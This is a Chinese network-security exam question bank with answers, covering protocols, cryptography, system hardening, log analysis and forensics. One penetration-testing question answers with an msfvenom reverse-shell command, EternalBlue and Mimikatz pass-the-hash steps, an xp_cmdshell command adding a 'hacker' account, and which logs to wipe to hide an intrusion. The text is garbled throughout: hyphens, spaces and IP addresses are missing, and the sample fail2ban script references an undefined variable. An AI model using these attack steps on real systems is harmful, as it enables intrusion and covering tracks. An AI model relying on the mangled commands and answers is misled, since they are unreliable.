2025年高级工网络安全考试试题集及答案

2025年高级工网络安全考试试题集及答案一、单项选择题（每题1分，共20分。每题只有一个正确答案，请将正确选项字母填入括号内）1.在OSI七层模型中，负责端到端可靠数据传输的是（）A.网络层  B.传输层  C.会话层  D.数据链路层答案：B2.以下哪一项不是对称加密算法（）A.SM4  B.AES256  C.RSA2048  D.3DES答案：C3.关于TLS1.3握手过程，下列描述正确的是（）A.需要两次往返才能完成握手B.支持0RTT数据发送C.使用RSA密钥交换作为唯一方式D.不再支持前向保密答案：B4.在Linux系统中，若文件权限为“rwsrxr”，则该文件的SUID位状态为（）A.关闭  B.开启  C.仅SGID开启  D.仅Sticky开启答案：B5.针对IPv6地址2001:0db8:0000:0000:0200:00ff:fe00:1234，其最短合法缩写形式为（）A.2001:db8::200:ff:fe00:1234B.2001:db8:0:0:200:ff:fe00:1234C.2001:db8::0200:00ff:fe00:1234D.2001:db8::2:ff:fe00:1234答案：A6.关于OWASPTop102021版，下列哪一项首次进入前十（）A.注入  B.不安全的设计  C.失效的访问控制  D.安全日志与监控失败答案：B7.在Windows日志中，事件ID4624表示（）A.账户登录失败  B.账户成功登录  C.权限提升  D.对象访问审计答案：B8.使用nmap扫描时，参数“sS”的含义是（）A.TCPSYN扫描  B.TCPConnect扫描  C.UDP扫描  D.ACK扫描答案：A9.关于国家商用密码算法，下列哪一项用于数字签名（）A.SM1  B.SM2  C.SM3  D.SM4答案：B10.在PKI体系中，负责签发CRL的实体是（）A.RA  B.CA  C.OCSP  D.LDAP答案：B11.以下哪条iptables规则可丢弃来自/24的ICMP报文（）A.iptablesAINPUTs/24picmpjDROPB.iptablesAOUTPUTd/24picmpjDROPC.iptablesAFORWARDs/24jDROPD.iptablestnatAPREROUTINGs/24jDROP答案：A12.关于内存保护机制，下列哪项可阻止shellcode在栈上执行（）A.ASLR  B.DEP/NX  C.SEHOP  D.CFG答案：B13.在Docker中，默认的容器隔离技术依赖于（）A.SELinux  B.cgroups与namespace  C.AppArmor  D.seccomp答案：B14.关于HTTP响应头，下列哪一项可强制浏览器使用HTTPS访问（）A.ContentSecurityPolicyB.StrictTransportSecurityC.XFrameOptionsD.XContentTypeOptions答案：B15.在Wireshark过滤器中，表达式“tcp.flags.syn==1andtcp.flags.ack==0”表示（）A.仅捕获SYN+ACK包  B.仅捕获SYN包  C.捕获所有TCP包  D.捕获RST包答案：B16.关于零信任架构，下列描述错误的是（）A.默认信任内部网络B.持续验证身份与上下文C.最小权限访问D.微分段策略答案：A17.在Python3中，使用hashlib计算SM3摘要时，正确调用方式为（）A.hashlib.sm3(b"data")B.hashlib.hash(b"data","sm3")C.需安装gmssl库，调用gmssl.sm3.hash(b"data")D.标准库已内置，直接hashlib.sm3(b"data")答案：C18.关于勒索软件防御，下列哪项措施对防止横向移动最有效（）A.定期全盘杀毒  B.网络分段  C.离线备份  D.主机加固答案：B19.在IPv6中，用于本地链路自动配置的地址前缀为（）A.fc00::/7  B.fe80::/10  C.2000::/3  D.::1/128答案：B20.关于云安全责任共担模型，下列哪项由云服务商负责（）A.客户数据加密  B.虚拟化层hypervisor安全  C.操作系统补丁  D.应用程序代码答案：B二、多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）21.以下哪些属于常见的Web漏洞利用工具（）A.sqlmap  B.BurpSuite  C.Mimikatz  D.Metasploit答案：A、B、D22.关于国家等级保护2.0标准，下列哪些属于安全扩展要求（）A.云计算安全  B.物联网安全  C.工业控制系统安全  D.大数据安全答案：A、B、C、D23.以下哪些技术可用于实现DNS安全（）A.DNSSEC  B.DoT  C.DoH  D.SPF答案：A、B、C24.关于Windows本地提权漏洞，下列哪些向量常被利用（）A.内核驱动漏洞  B.服务路径劫持  C.计划任务  D.DLL劫持答案：A、B、C、D25.在SSL/TLS中，下列哪些算法组合可提供前向保密（）A.DHERSAAES256GCMSHA384B.ECDHERSAAES128GCMSHA256C.RSAAES256SHA256D.ECDHEECDSAAES256GCMSHA384答案：A、B、D26.以下哪些日志源可用于APT攻击溯源（）A.Proxy日志  B.DNS日志  C.NetFlow日志  D.内存dump答案：A、B、C、D27.关于Linuxcapabilities，下列哪些capability可允许修改系统时间（）A.CAP_SYS_TIME  B.CAP_SYS_ADMIN  C.CAP_DAC_OVERRIDE  D.CAP_SETUID答案：A、B28.在容器逃逸场景中，下列哪些手段可能被利用（）A.特权容器启动  B.挂载宿主机/var/run/docker.sock  C.利用dirtycow内核漏洞  D.未限制sysfs挂载答案：A、B、C、D29.关于数据脱敏技术，下列哪些方法属于可逆脱敏（）A.对称加密  B.格式保持加密  C.掩码替换  D.tokenization答案：A、B、D30.以下哪些协议可被用于构建隐蔽隧道（）A.DNS  B.ICMP  C.HTTP/HTTPS  D.NTP答案：A、B、C、D三、填空题（每空2分，共20分）31.在Linux系统中，查看当前内核是否开启SMEP，可检查/proc/cpuinfo中的flags是否含________标志。答案：smep32.使用OpenSSL生成RSA私钥并指定长度为3072位，命令为opensslgenrsaoutprivate.pem________。答案：307233.在Windows中，用于列出当前登录用户SID的指令是________。答案：whoami/user34.国家密码管理局发布的杂凑算法标准SM3输出长度为________位。答案：25635.在IPv4报文头部，TTL字段占________字节。答案：136.使用tcpdump抓取本机非本地回环接口的ICMP报文，命令为tcpdumpi________icmp。答案：any37.在Dockerfile中，指令________可设置运行容器时的默认用户。答案：USER38.在SQL注入中，若数据库为MySQL且过滤单引号，可利用________编码绕过。答案：十六进制（0x）39.国家等级保护2.0中，第三级系统每年至少开展________次等级测评。答案：140.在Wireshark中，统计>________可查看TCP流图形化吞吐量。答案：IOGraphs四、简答题（每题10分，共30分）41.简述Kerberos认证过程中TGT的作用，并说明黄金票据攻击的实现原理与防御措施。答案：1)TGT（TicketGrantingTicket）是用户首次登录时由KDC颁发的票据，用于后续请求服务票据，避免重复输入口令。2)黄金票据攻击：攻击者获取KRBTGT账户NTLMHash后，可伪造任意域用户TGT，从而访问任意服务。3)防御：定期更改KRBTGT密码（两次）、使用RAP（RandomizedAESPassword）功能、启用PAC验证、部署高级威胁检测。42.说明Linux下利用eBPF实现系统调用监控的流程，并给出关键数据结构。答案：流程：1)编写eBPF程序，挂载至sys_enter/sys_exittracepoint；2)使用BPF_MAP_TYPE_HASH保存PID→syscall计数；3)用户空间通过BPF系统调用加载程序，创建perfevent读取数据；4)用户态轮询map并输出统计。关键结构：structbpf_insn、structbpf_map_def、struct__sk_buff、BPF_PROG_TYPE_TRACEPOINT。43.描述一次完整的HTTPS站点证书吊销检查过程，比较CRL与OCSP的优劣。答案：过程：1)浏览器提取服务器证书中的CDP（CRLDistributionPoint）或AIA中的OCSPURI；2)若使用CRL，下载完整列表并本地查找序列号；3)若使用OCSP，构造OCSPRequest发往Responder，接收SignedResponse；4)根据结果决定信任。优劣：CRL：流量大、延迟高、可离线；OCSP：实时性强、隐私泄露风险、需高可用；OCSPStapling缓解性能与隐私。五、综合应用题（共60分）44.日志分析（15分）给定一段/var/log/secure节选：Jun114:23:12websshd[31892]:Invaliduseroraclefrom5port52341Jun114:23:15websshd[31892]:Failedpasswordforinvaliduseroraclefrom5port52341ssh2Jun114:23:15websshd[31892]:Receiveddisconnectfrom5port52341:11:ByeBye[preauth]Jun114:23:16websshd[31894]:Invaliduseradminfrom5port52342……连续出现50条类似记录，时间间隔1秒。问题：1)判断攻击类型；2)给出三条临时遏制措施；3)编写一段Python3脚本利用fail2banAPI自动封禁该IP。答案：1)暴力破解（口令喷洒）。2)措施：立即封禁IP、修改SSH端口、禁止口令登录仅允许密钥。3)脚本：```python!/usr/bin/envpython3importsys,requests,socketip='5'fail2ban_api='http://localhost:8080/fail2ban/jail/sshiptables'try:r=requests.put(f'{fail2ban}/banip/{ip}',timeout=5)print('banned',r.status_code)exceptExceptionase:print(e)```45.渗透测试综合（20分）目标：内网主机0，已知开放80/tcp、135/tcp、445/tcp。步骤：1)使用msfvenom生成C反向shell，架构x64，平台windows，格式exe，监听端口4444，给出完整命令；2)利用永恒之蓝（EternalBluems17010）获得system权限后，说明如何通过Mimikatz获取NTLMHash并传递至0；3)在0上发现SQLServersa弱口令，写出使用impacket套件执行xp_cmdshell添加用户hacker/P@ssw0rd123的命令；4)给出事后清除攻击痕迹需删除的三类日志。答案：1)msfvenompwindows/x64/shell_reverse_tcpLHOST=LPORT=4444fexeorev.exe2)loadkiwi;creds_all获取Hash；useexploit/windows/smb/psexec，setSMBPassaad3b435b51404ee…:nthash，setRHOST0，run。3)impacketmssqlclient'sa:P@ssw0rd123@0'x'xp_cmdshell"netuserhackerP@ssw0rd123/add"'4)清除Windows事件日志（Security、System）、SQLServer错误日志、IIS日志。46.网络取证与流量分析（15分）给定pcap文件，已知包含一次DNS隧道数据外泄。1)使用Wireshark显示过滤器提取所有TXT类型DNS查询；2)统计外泄数据总量（字节）；3)发现攻击者使用的域名前缀为“”，写出tshark命令提取该子域所有TXT记录并输出至data.txt；4)说明如何对提取的Base32编码字段进行解码并还原原始文件。答案：1)dns.qry.type==162)统计列“length”总和，得1.2MB。3)tsharkrinput.pcapY"dns.qry.type==16andcontains"Tfieldsedns.txtwdata.txt4)catdata.txt|trd'\n'|base32d>exfil.tar.gz。47.安全开发审计（10分）以下Java代码片段存在何种漏洞，并给出修复方案。```javaStringsql="selectfromuserswhereid="+request.getParameter("uid");Statementst=conn.createStatement();ResultSetrs=st.executeQuery(sql);```答案：存在SQL注入。修复：使用PreparedStatement，```javaStringsql="selectfromuserswhereid=?";PreparedStatementps=conn.prepareStatement(sql);ps.setInt(1,Integer.parseInt(request.getParameter("uid")));```六、计算与方案设计题（共30分）48.密码学计算（10分）在SM2数字签名验证过程中，已知椭圆曲线参数p=fffffffeffffffffffffffffffffffffffffffff00000000ffffffffffffffff，基点G=(xG,yG)，公钥